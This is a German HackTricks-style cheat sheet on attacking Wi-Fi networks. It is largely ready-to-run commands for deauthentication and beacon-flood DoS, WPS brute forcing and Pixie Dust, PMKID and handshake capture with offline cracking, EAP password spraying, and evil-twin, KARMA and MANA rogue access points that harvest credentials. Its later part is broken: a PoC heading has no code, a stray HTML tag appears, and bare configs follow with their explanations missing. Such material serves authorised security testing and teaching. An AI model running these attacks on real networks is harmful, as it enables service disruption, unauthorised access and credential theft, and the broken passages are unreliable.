Pentesting Wifi

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Wifi Grundlegende Befehle

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Werkzeuge

Hijacker & NexMon (Android internal Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

airgeddon mit docker ausführen

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Von: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Es kann Evil Twin-, KARMA- und Known Beacons-Angriffe durchführen und anschließend eine phishing-Vorlage verwenden, um das echte Passwort des Netzwerks zu erlangen oder Zugangsdaten sozialer Netzwerke abzufangen.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Dieses Tool automatisiert WPS/WEP/WPA-PSK-Angriffe. Es wird automatisch:

• Das Interface in den Monitor-Modus setzen
• Nach möglichen Netzwerken scannen - und dir erlauben, das/die Ziel(e) auszuwählen
• Bei WEP - WEP-Angriffe starten
• Bei WPA-PSK
• Bei WPS: Pixie dust attack und bruteforce attack (Achtung: der bruteforce-Angriff kann lange dauern). Beachte, dass keine null PINs oder datenbank-/generierten PINs ausprobiert werden.
• Versucht, das PMKID vom AP zu erfassen, um es zu cracken
• Versucht, Clients des AP zu deauthentifizieren, um einen Handshake zu erfassen
• Bei PMKID oder Handshake, versucht es, mit top5000-Passwörtern zu bruteforcen.

Angriffsübersicht

• DoS
• Deauthentication/disassociation – Alle trennen (oder eine spezifische ESSID/Client)
• Random fake APs – Netze verbergen, Scanner zum Absturz bringen
• Overload AP – Versuch, den AP zu killen (meist nicht sehr nützlich)
• WIDS – Mit dem IDS spielen
• TKIP, EAPOL – Einige spezifische Angriffe, um einige APs zu DoS-en
• Cracking
• Crack WEP (verschiedene Tools und Methoden)
• WPA-PSK
• WPS pin “Brute-Force”
• WPA PMKID bruteforce
• [DoS +] WPA handshake capture + Cracking
• WPA-MGT
• Username capture
• Bruteforce Credentials
• Evil Twin (with or without DoS)
• Open Evil Twin [+ DoS] – Nützlich, um captive portal creds zu erfassen und/oder LAN-Angriffe durchzuführen
• WPA-PSK Evil Twin – Nützlich für Netzwerkangriffe, wenn du das Passwort kennst
• WPA-MGT – Nützlich, um Firmen-Credentials zu erfassen
• KARMA, MANA, Loud MANA, Known beacon
• + Open – Nützlich, um captive portal creds zu erfassen und/oder LAN-Angriffe durchzuführen
• + WPA – Nützlich, um WPA handshakes zu erfassen

DOS

Deauthentication Packets

Beschreibung von here:.

Deauthentication-Angriffe, eine weit verbreitete Methode im Wi-Fi-Hacking, beinhalten das Fälschen von “management” frames, um Geräte gezielt von einem Netzwerk zu trennen. Diese unverschlüsselten Pakete täuschen Clients, dass sie vom legitimen Netzwerk stammen, und ermöglichen Angreifern, WPA handshakes zum Cracking zu sammeln oder dauerhaft Netzwerkverbindungen zu stören. Diese Taktik ist beunruhigend simpel, wird häufig verwendet und hat weitreichende Folgen für die Netzwerksicherheit.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

• -0 bedeutet deauthentication
• 1 ist die Anzahl der zu sendenden deauths (man kann mehrere senden, wenn gewünscht); 0 bedeutet, sie kontinuierlich zu senden
• -a 00:14:6C:7E:40:80 ist die MAC-Adresse des Access Points
• -c 00:0F:B5:34:30:30 ist die MAC-Adresse des Clients, der deauthenticate werden soll; wenn dies weggelassen wird, wird eine Broadcast-deauthentication gesendet (funktioniert nicht immer)
• ath0 ist der Schnittstellenname

Disassociation Packets

Disassociation packets, ähnlich wie deauthentication packets, sind eine Art Management-Frame, der in Wi-Fi-Netzwerken verwendet wird. Diese Pakete dienen dazu, die Verbindung zwischen einem Gerät (z. B. einem Laptop oder Smartphone) und einem Access Point (AP) zu trennen. Der wesentliche Unterschied zwischen disassociation und deauthentication liegt in ihren Einsatzszenarien. Während ein AP deauthentication packets sendet, um rogue devices explizit aus dem Netzwerk zu entfernen, werden disassociation packets typischerweise gesendet, wenn sich der AP herunterfährt, neu startet oder umzieht, wodurch die Trennung aller verbundenen Knoten erforderlich wird.

Dieser Angriff kann mit mdk4(mode “d”) durchgeführt werden:

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Weitere DOS-Angriffe durch mdk4

Siehe here.

ATTACK MODE b: Beacon Flooding

Sendet beacon frames, um Clients gefälschte APs anzuzeigen. Das kann manchmal network scanners und sogar drivers zum Absturz bringen!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Das Senden von authentication frames an alle erreichbaren Access Points (APs) in Reichweite kann diese APs, besonders bei vielen Clients, überlasten. Dieser intensive Traffic kann zu Systeminstabilität führen, wodurch einige APs einfrieren oder sogar neu starten/resetten können.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) prüft, ob eine SSID korrekt angezeigt wird und bestätigt die Reichweite des APs. Diese Technik, gekoppelt mit bruteforcing hidden SSIDs mit oder ohne wordlist, hilft, versteckte Netzwerke zu identifizieren und zu betreten.

ATTACK MODE m: Michael Countermeasures Exploitation

Das Senden zufälliger oder doppelter packets an verschiedene QoS queues kann Michael Countermeasures auf TKIP APs auslösen und zu einer einminütigen Abschaltung des APs führen. Diese Methode ist eine effiziente DoS (Denial of Service) Angriffstaktik.

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Das Fluten eines AP mit EAPOL Start frames erzeugt fake sessions, überlastet den AP und blockiert legitime clients. Alternativ erzwingt das Injizieren von fake EAPOL Logoff messages die Trennung von clients; beide Methoden stören effektiv den Netzwerkdienst.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Angriffe gegen IEEE 802.11s Mesh-Netzwerke

Verschiedene Angriffe auf Link-Management und Routing in Mesh-Netzwerken.

ATTACK MODE w: WIDS-Verwirrung

Cross-connecting von Clients zu mehreren WDS-Knoten oder gefälschten rogue APs kann Intrusion Detection and Prevention Systems manipulieren, Verwirrung stiften und potenziellen Systemmissbrauch ermöglichen.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

Ein packet fuzzer mit diversen Paketquellen und einem umfassenden Satz von Modifikatoren zur Paketmanipulation.

Airggedon

Airgeddon bietet die meisten der in den vorherigen Kommentaren vorgeschlagenen Angriffe:

WPS

WPS (Wi‑Fi Protected Setup) vereinfacht den Vorgang, Geräte mit einem Router zu verbinden, und beschleunigt sowie vereinfacht die Einrichtung für Netzwerke, die mit WPA oder WPA2 Personal verschlüsselt sind. Es ist für die leicht zu kompromittierende WEP-Sicherheit nicht wirksam. WPS verwendet eine 8-stellige PIN, die in zwei Hälften validiert wird, wodurch sie aufgrund der begrenzten Anzahl an Kombinationen (11.000 Möglichkeiten) anfällig für brute-force attacks ist.

WPS Bruteforce

Es gibt 2 Haupttools, um diese Aktion durchzuführen: Reaver und Bully.

• Reaver wurde entwickelt, um einen robusten und praxisgerechten Angriff gegen WPS darzustellen und wurde gegen eine große Vielfalt von Access Points und WPS-Implementierungen getestet.
• Bully ist eine neue Implementierung des WPS brute force attack, geschrieben in C. Es hat mehrere Vorteile gegenüber dem originalen reaver-Code: weniger Abhängigkeiten, verbesserte Speicher- und CPU-Leistung, korrekte Behandlung von endianness und ein robusteres Optionsset.

Der Angriff nutzt die Schwachstelle des WPS PIN’s vulnerability aus, insbesondere die Offenlegung der ersten vier Ziffern und die Rolle der letzten Ziffer als Prüfsumme, was den brute-force attack erleichtert. Verteidigungen gegen brute-force attacks, wie das blocking MAC addresses aggressiver Angreifer, erfordern jedoch MAC address rotation, um den Angriff fortzusetzen.

Nach Erlangen der WPS PIN mit Tools wie Bully oder Reaver kann der Angreifer den WPA/WPA2 PSK ableiten und so persistent network access erlangen.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Dieser verfeinerte Ansatz zielt auf WPS PINs ab und nutzt bekannte Schwachstellen:

1. Pre-discovered PINs: Nutzen Sie eine Datenbank mit bekannten PINs, die bestimmten Herstellern zugeordnet sind, die einheitliche WPS PINs verwenden. Diese Datenbank korreliert die ersten drei Oktette von MAC-addresses mit wahrscheinlichen PINs für diese Hersteller.
2. PIN Generation Algorithms: Verwenden Sie Algorithmen wie ComputePIN und EasyBox, die WPS PINs basierend auf der MAC-address des AP berechnen. Der Arcadyan-Algorithmus benötigt zusätzlich eine device ID, wodurch eine weitere Ebene im PIN-Generierungsprozess entsteht.

WPS Pixie Dust attack

Dominique Bongard entdeckte eine Schwachstelle in einigen Access Points (APs) bezüglich der Erstellung geheimer Codes, bekannt als nonces (E-S1 und E-S2). Können diese nonces ermittelt werden, wird das Knacken des WPS PIN des APs einfach. Der AP offenbart den PIN innerhalb eines speziellen Codes (hash), um zu beweisen, dass er legitim und kein rogue AP ist. Diese nonces sind im Grunde die “Schlüssel”, um den “Tresor” zu öffnen, der den WPS PIN enthält. Mehr dazu findet sich hier.

Einfach gesagt besteht das Problem darin, dass einige APs nicht zufällig genug Schlüssel zur Verschlüsselung des PIN während des Verbindungsprozesses verwendeten. Dadurch ist der PIN anfällig dafür, von außerhalb des Netzwerks erraten zu werden (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Wenn du das Gerät nicht in monitor mode versetzen möchtest oder reaver und bully Probleme haben, kannst du OneShot-C ausprobieren. Dieses Tool kann eine Pixie Dust attack durchführen, ohne in monitor mode wechseln zu müssen.

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Einige schlecht entworfene Systeme erlauben sogar, dass ein Null PIN (eine leere oder nicht vorhandene PIN) Zugriff gewährt, was ziemlich ungewöhnlich ist. Das Tool Reaver kann diese Sicherheitslücke testen, im Gegensatz zu Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All the proposed WPS attacks can be easily performed using airgeddon.

• 5 and 6 lets you try deinen eigenen PIN (falls vorhanden)
• 7 and 8 perform the Pixie Dust attack
• 13 allows you to test the NULL PIN
• 11 and 12 werden die PINs, die mit dem ausgewählten AP in verfügbaren Datenbanken verknüpft sind, zusammentragen und mögliche PINs generieren mit: ComputePIN, EasyBox und optional Arcadyan (empfohlen, warum nicht?)
• 9 and 10 will test alle möglichen PINs

WEP

So broken and unused nowdays. Just know that airgeddon have a WEP option called “All-in-One” to attack this kind of protection. More tools offer similar options.

WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs one single packet and doesn’t require any clients to be connected to the target AP—just interaction between the attacker and the AP.

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes the PMKID.

As the original post explains, the PMKID is created using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Da der “PMK Name” konstant ist, die BSSID des AP und die Station bekannt sind und der PMK identisch mit dem aus einem vollständigen 4-way handshake ist, kann hashcat diese Informationen nutzen, um den PSK zu knacken und die passphrase wiederherzustellen!

Um diese Informationen zu sammeln und das Passwort lokal per bruteforce zu knacken, kannst du Folgendes tun:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Die PMKIDs captured werden in der Konsole angezeigt und außerdem gespeichert in _ /tmp/attack.pcap_
Konvertiere nun die Aufnahme in das hashcat/john-Format und knacke sie:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Bitte beachten Sie, dass das Format eines korrekten Hashes 4 Teile enthält, z. B.: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Wenn er nur 3 Teile enthält, ist er ungültig (der PMKID capture war nicht gültig).

Bitte beachten Sie, dass hcxdumptool auch handshakes erfasst (so etwas wird erscheinen: MP:M1M2 RC:63258 EAPOLTIME:17091). Sie können die handshakes mit cap2hccapx in das hashcat/john-Format umwandeln.

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Mir ist aufgefallen, dass einige handshakes, die mit diesem Tool erfasst wurden, selbst bei bekanntem korrektem Passwort nicht cracked werden konnten. Ich empfehle, handshakes wenn möglich zusätzlich auf traditionelle Weise zu erfassen oder mehrere davon mit diesem Tool zu sammeln.

Handshake capture

Ein Angriff auf WPA/WPA2-Netzwerke kann durchgeführt werden, indem ein handshake erfasst und versucht wird, das Passwort offline zu cracken. Dieser Prozess beinhaltet das Überwachen der Kommunikation eines bestimmten Netzwerks und der BSSID auf einem bestimmten channel. Hier eine vereinfachte Anleitung:

1. Identifiziere die BSSID, den channel, und einen connected client des Zielnetzwerks.
2. Verwende airodump-ng, um den Netzwerkverkehr auf dem angegebenen channel und der BSSID zu überwachen, in der Hoffnung, einen handshake zu erfassen. Der Befehl sieht ungefähr so aus:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

Um die Chance zu erhöhen, einen handshake zu erfassen, trennen Sie den client kurzzeitig vom Netzwerk, um eine re-authentication zu erzwingen. Dies kann mit dem Befehl aireplay-ng gemacht werden, der deauthentication packets an den client sendet:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Beachte, dass der Client, da er deauthenticated wurde, versuchen könnte, sich mit einem anderen AP oder — in anderen Fällen — mit einem anderen Netzwerk zu verbinden.

Sobald in airodump-ng einige handshake-Informationen erscheinen, bedeutet das, dass der handshake erfasst wurde und du mit dem Abhören aufhören kannst:

Sobald der handshake erfasst wurde, kannst du ihn mit aircrack-ng crack:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Prüfen, ob ein Handshake in der Datei enthalten ist

aircrack

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Wenn dieses Tool einen nicht abgeschlossenen handshake einer ESSID vor dem abgeschlossenen findet, erkennt es den gültigen nicht.

pyrit

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

In Enterprise-WiFi-Setups wirst du auf verschiedene Authentifizierungsverfahren stoßen, die jeweils unterschiedliche Sicherheitsstufen und Management-Funktionen bieten. Wenn du Tools wie airodump-ng verwendest, um den Netzwerkverkehr zu inspizieren, kannst du Bezeichner für diese Authentifizierungstypen bemerken. Einige gängige Methoden sind:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

1. EAP-GTC (Generic Token Card):

• Diese Methode unterstützt Hardware-Token und Einmalpasswörter innerhalb von EAP-PEAP. Im Gegensatz zu MSCHAPv2 verwendet sie keine peer challenge und sendet Passwörter im plaintext an den access point, was ein Risiko für downgrade attacks darstellt.

2. EAP-MD5 (Message Digest 5):

• Beinhaltet das Senden des MD5-Hashes des Passworts vom Client. Es wird nicht empfohlen, da es anfällig für Wörterbuchangriffe ist, keine Server-Authentifizierung bietet und nicht in der Lage ist, sessionspezifische WEP-Schlüssel zu erzeugen.

3. EAP-TLS (Transport Layer Security):

• Verwendet sowohl client- als auch serverseitige Zertifikate zur Authentifizierung und kann dynamisch benutzer- und sitzungsbasierte WEP-Schlüssel zur Sicherung der Kommunikation erzeugen.

4. EAP-TTLS (Tunneled Transport Layer Security):

• Bietet gegenseitige Authentifizierung über einen verschlüsselten Tunnel sowie eine Methode zur Ableitung dynamischer, pro Benutzer und pro Sitzung gültiger WEP-Schlüssel. Es benötigt nur serverseitige Zertifikate; Clients verwenden Anmeldeinformationen.

5. PEAP (Protected Extensible Authentication Protocol):

• Funktioniert ähnlich wie EAP, indem ein TLS-Tunnel für geschützte Kommunikation erstellt wird. Dadurch können auch schwächere Authentifizierungsprotokolle oberhalb von EAP verwendet werden, weil der Tunnel Schutz bietet.
• PEAP-MSCHAPv2: Oft einfach als PEAP bezeichnet, kombiniert es den verwundbaren MSCHAPv2 Challenge/Response-Mechanismus mit einem schützenden TLS-Tunnel.
• PEAP-EAP-TLS (or PEAP-TLS): Ähnlich zu EAP-TLS, aber es wird zuerst ein TLS-Tunnel aufgebaut, bevor Zertifikate ausgetauscht werden, was eine zusätzliche Sicherheitsschicht bietet.

You can find more information about these authentication methods here and here.

Username Capture

Beim Lesen von https://tools.ietf.org/html/rfc3748#page-27 sieht es so aus, dass wenn man EAP verwendet, die “Identity” messages unterstützt werden müssen, und der username im clear in den “Response Identity”-Nachrichten gesendet wird.

Selbst bei Verwendung eines der sichersten Authentifizierungsverfahren: PEAP-EAP-TLS, ist es möglich, den im EAP-Protokoll gesendeten Benutzernamen zu capture. Dazu muss eine Authentifizierungs-Kommunikation aufgezeichnet werden (starte airodump-ng auf einem Kanal und wireshark im selben Interface) und filtere die Pakete nach eapol.
Innerhalb des “Response, Identity”-Pakets erscheint der username des Clients.

Anonymous Identities

Identity-Hiding wird sowohl von EAP-PEAP als auch von EAP-TTLS unterstützt. Im Kontext eines WiFi-Netzwerks wird eine EAP-Identity-Anfrage typischerweise vom access point (AP) während des Association-Prozesses initiiert. Um die Anonymität der Benutzer zu schützen, enthält die Antwort des EAP-Clients auf dem Gerät des Benutzers nur die unbedingt erforderlichen Informationen, die der initiale RADIUS-Server zur Verarbeitung der Anfrage benötigt. Dieses Konzept lässt sich durch die folgenden Szenarien veranschaulichen:

• EAP-Identity = anonymous
• In diesem Szenario verwenden alle Benutzer den pseudonymen Identifikator “anonymous”. Der initiale RADIUS-Server fungiert entweder als EAP-PEAP- oder EAP-TTLS-Server und ist für die serverseitige Handhabung des PEAP- bzw. TTLS-Protokolls verantwortlich. Die innere (geschützte) Authentifizierungsmethode wird dann entweder lokal durchgeführt oder an einen entfernten (home) RADIUS-Server delegiert.
• EAP-Identity = anonymous@realm_x
• In diesem Fall verbergen Benutzer aus verschiedenen Realms ihre Identität, geben jedoch ihre jeweiligen Realms an. Dadurch kann der initiale RADIUS-Server die EAP-PEAP- oder EAP-TTLS-Anfragen an RADIUS-Server in ihren Home-Realms proxyen, die als PEAP- oder TTLS-Server fungieren. Der initiale RADIUS-Server arbeitet dabei ausschließlich als RADIUS-Relay-Node.
• Alternativ kann der initiale RADIUS-Server auch als EAP-PEAP- oder EAP-TTLS-Server fungieren und entweder die geschützte Authentifizierungsmethode selbst behandeln oder an einen anderen Server weiterleiten. Diese Option ermöglicht die Konfiguration unterschiedlicher Policies für verschiedene Realms.

Bei EAP-PEAP, sobald der TLS-Tunnel zwischen dem PEAP-Server und dem PEAP-Client etabliert ist, initiiert der PEAP-Server eine EAP-Identity-Anfrage und überträgt diese durch den TLS-Tunnel. Der Client antwortet auf diese zweite EAP-Identity-Anfrage, indem er eine EAP-Identity-Antwort mit der echten Identität des Benutzers durch den verschlüsselten Tunnel sendet. Dieser Ansatz verhindert effektiv, dass die echte Identität des Benutzers von jemandem, der den 802.11-Verkehr abhört, offengelegt wird.

EAP-TTLS folgt einem leicht anderen Verfahren. Bei EAP-TTLS authentifiziert sich der Client typischerweise mit PAP oder CHAP, abgesichert durch den TLS-Tunnel. In diesem Fall fügt der Client ein User-Name-Attribut und entweder ein Password- oder CHAP-Password-Attribut in die initiale TLS-Nachricht ein, die nach der Tunnel-Etablierung gesendet wird.

Unabhängig vom gewählten Protokoll erhält der PEAP/TTLS-Server Kenntnis über die echte Identität des Benutzers, nachdem der TLS-Tunnel etabliert wurde. Die echte Identität kann als user@realm oder einfach user dargestellt werden. Wenn der PEAP/TTLS-Server auch für die Authentifizierung des Benutzers verantwortlich ist, besitzt er nun die Benutzeridentität und fährt mit der durch den TLS-Tunnel geschützten Authentifizierungsmethode fort. Alternativ kann der PEAP/TTLS-Server eine neue RADIUS-Anfrage an den Home-RADIUS-Server des Benutzers weiterleiten. Diese neue RADIUS-Anfrage lässt die PEAP- oder TTLS-Protokollschicht weg. Wenn die geschützte Authentifizierungsmethode EAP ist, werden die inneren EAP-Nachrichten an den Home-RADIUS-Server ohne die EAP-PEAP- oder EAP-TTLS-Hülle übermittelt. Das User-Name-Attribut der ausgehenden RADIUS-Nachricht enthält die echte Identität des Benutzers und ersetzt den anonymen User-Name aus der eingehenden RADIUS-Anfrage. Wenn die geschützte Authentifizierungsmethode PAP oder CHAP ist (nur von TTLS unterstützt), werden der User-Name und andere aus der TLS-Payload extrahierte Authentifizierungsattribute in der ausgehenden RADIUS-Nachricht eingesetzt und ersetzen so den anonymen User-Name und die TTLS EAP-Message-Attribute der eingehenden RADIUS-Anfrage.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-basierte Wi‑Fi-Authentifizierung mit EAP‑SIM/EAP‑AKA über 802.1X kann die permanente Teilnehmerkennung (IMSI) im Klartext während der unauthentifizierten Identity-Phase leak, wenn die Deployment keine Pseudonyme/protected identities oder keinen TLS-Tunnel um das innere EAP implementiert.

Where the leak happens (high level):

• 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
• Authenticator sends EAP-Request/Identity.
• Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
• Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
• Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

</details>

Hinweise:
- Funktioniert bevor ein TLS‑Tunnel aufgebaut ist, wenn die Infrastruktur reines EAP‑SIM/AKA ohne geschützte Identitäten/Pseudonyme verwendet.
- Der offenbare Wert ist ein permanenter Identifikator, der an die SIM des Teilnehmers gebunden ist; das Sammeln ermöglicht langfristiges Tracking und nachgelagerte Missbräuche im Telekom‑Bereich.

Auswirkungen
- Privatsphäre: persistentes Tracking von Nutzer*innen/Geräten durch passive Wi‑Fi‑Aufzeichnungen an öffentlichen Orten.
- Grundlage für Telekom‑Missbrauch: Mit der IMSI kann ein Angreifer mit SS7/Diameter‑Zugriff Standortabfragen durchführen oder versuchen, Anrufe/SMS abzufangen und MFA zu stehlen.

Gegenmaßnahmen / worauf zu achten ist
- Überprüfen Sie, dass Clients anonyme äußere Identitäten (Pseudonyme) für EAP‑SIM/AKA gemäß 3GPP‑Richtlinien (z. B. 3GPP TS 33.402) verwenden.
- Bevorzugen Sie das Tunneln der Identitätsphase (z. B. EAP‑TTLS/PEAP mit innerem EAP‑SIM/AKA), sodass die IMSI niemals im Klartext gesendet wird.
- Packet‑Captures der Association/Auth sollten niemals eine rohe IMSI in EAP-Response/Identity zeigen.

Verwandt: Ausnutzung von Telekom‑Signalisierung mit erfassten Mobil‑Identifikatoren
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>

### EAP-Bruteforce (password spray)

Wenn vom Client erwartet wird, einen **Benutzernamen und ein Passwort** zu verwenden (beachte, dass **EAP-TLS in diesem Fall nicht gültig ist**), kannst du versuchen, eine **Liste** von **Benutzernamen** (siehe nächsten Abschnitt) und **Passwörtern** zu beschaffen und den Zugriff mit [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

apt-get install dnsmasq #Manages DHCP and DNS

interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

dnsmasq -C dnsmasq.conf -d

apt-get install hostapd

interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon

./eaphammer -i wlan0 --essid exampleCorp --captive-portal

./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

--negotiate weakest

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]

# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]

./eaphammer -i wlan0 --mana [--loud] --known-beacons  --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]

# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
--known-essids-file known-s.txt \
--dst-addr 11:22:33:11:22:33 \
--burst-count 5